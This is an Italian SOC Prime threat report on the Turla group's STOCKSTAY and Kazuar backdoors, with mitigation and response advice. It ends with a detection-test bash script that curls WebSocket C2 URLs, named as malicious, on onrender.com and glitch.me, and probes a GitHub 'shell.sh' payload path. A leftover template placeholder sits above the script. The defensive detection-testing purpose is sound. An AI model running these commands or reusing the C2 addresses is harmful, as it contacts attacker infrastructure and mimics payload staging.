SOC Prime Bias: Critico

14 Jul 2026 15:35 UTC

Turla (Blizzard Segreto): i Backdoor STOCKSTAY e Kazuar Spiegati

Author Photo
SOC Prime Team linkedin icon Segui
Turla (Blizzard Segreto): i Backdoor STOCKSTAY e Kazuar Spiegati
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riassunto

Turla è un gruppo APT di lunga data, allineato con la Russia e associato all’FSB, noto per operazioni di cyber-spionaggio contro bersagli governativi e militari. Il gruppo si affida a malware personalizzati, inclusi i backdoor STOCKSTAY e Kazuar, per mantenere l’accesso a lungo termine negli ambienti compromessi. Abusa anche frequentemente di servizi cloud legittimi come GitHub e Cloudflare per mascherare il traffico di comando e controllo.

Indagine

Il rapporto esamina l’evoluzione dei set di strumenti malware di Turla, concentrandosi sulle famiglie STOCKSTAY e Kazuar. Analizza le tecniche di dirottamento dell’infrastruttura del gruppo, il suo uso di piattaforme serverless per il comando e il controllo e la sua capacità di sfruttare vulnerabilità come il percorso di traversamento di WinRAR. L’indagine mette anche in evidenza l’uso da parte di Turla di chiavi ambientali per ridurre l’esposizione all’analisi in sandbox.

Mitigazione

Le organizzazioni dovrebbero implementare un monitoraggio attento per l’uso non autorizzato di piattaforme web fidate come GitHub e Cloudflare quando i modelli di traffico appaiono anomali. L’applicazione tempestiva delle patch per le vulnerabilità come CVE-2025-8088 è essenziale per prevenire scritture di file non autorizzate. I difensori dovrebbero anche prestare attenzione all’installazione non autorizzata di certificati radice e all’esecuzione sospetta di PowerShell o VBScript che potrebbero indicare attività di Turla.

Risposta

Se viene rilevata un’attività di Turla, i risponditori dovrebbero isolare gli host interessati e indagare su account amministratore locale non autorizzati. Dovrebbe essere condotta una revisione dettagliata degli alberi dei processi per scoprire il caricamento laterale di DLL che coinvolge binari legittimi come le utility di NVIDIA o Brother Printer. Anche la telemetria di rete dovrebbe essere controllata per traffico WebSocket inusuale, e l’archivio delle fiducie della macchina dovrebbe essere revisionato per modifiche sospette ai certificati.

Flusso di Attacco

Esecuzione della Simulazione

Prerequisito: Il Controllo Pre-volo di Telemetria e Baseline deve essere superato.

Razionale: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente i TTP identificati e mirano a generare l’esatta telemetria prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una cattiva diagnosi.

  • Narrativa dell’Attacco e Comandi: Un avversario ha stabilito con successo un punto d’appoggio e ora sta tentando di stabilire la comunicazione C2. Per eludere il rilevamento, usano un approccio “living-off-the-land” contattando una piattaforma serverless ospitata su onrender.com via una connessione WebSocket. Contemporaneamente tentano di prelevare un payload di seconda fase da un repository pubblico GitHub per confondersi con il traffico degli sviluppatori. La simulazione utilizzerà curl and wscat (se disponibile) o richieste web standard per generare i pattern di URL specificati nella logica di rilevamento.

  • Script di Test di Regressione: [Provide the exact, self-contained, and executable code snippet for the simulation.]

    #!/bin/bash
    # Script di simulazione per la Validazione del Rilevamento C2 STOCKSTAY
    
    echo "[+] Avvio della simulazione: TTPs STOCKSTAY C2"
    
    # 1. Innesco: C2 WebSocket tramite Render (URL Specifico)
    echo "[*] Simulazione della connessione WebSocket a URL Render malevolo..."
    curl -k "wss://google-ai-labs-it.onrender.com/ws"
    
    # 2. Innesco: C2 WebSocket tramite Glitch (URL Specifico)
    echo "[*] Simulazione della connessione WebSocket a URL Glitch malevolo..."
    curl -k "wss://wool-basalt-clock.glitch.me/ws"
    
    # 3. Innesco: GitHub Staging (Corrispondenza Dominio Ampio)
    echo "[*] Simulazione del caricamento in staging del payload via GitHub..."
    curl -I "https://github.com/malicious-actor/payload-repo/raw/main/shell.sh"
    
    echo "[+] Simulazione completata. Controlla SIEM per gli avvisi."
  • Comandi di Pulizia:

    # Nessun artefatto persistente viene creato su questo host dalla simulazione.
    # Assicurati che eventuali file bash temporanei siano rimossi se creati.
    rm -f simulation_stockstay.sh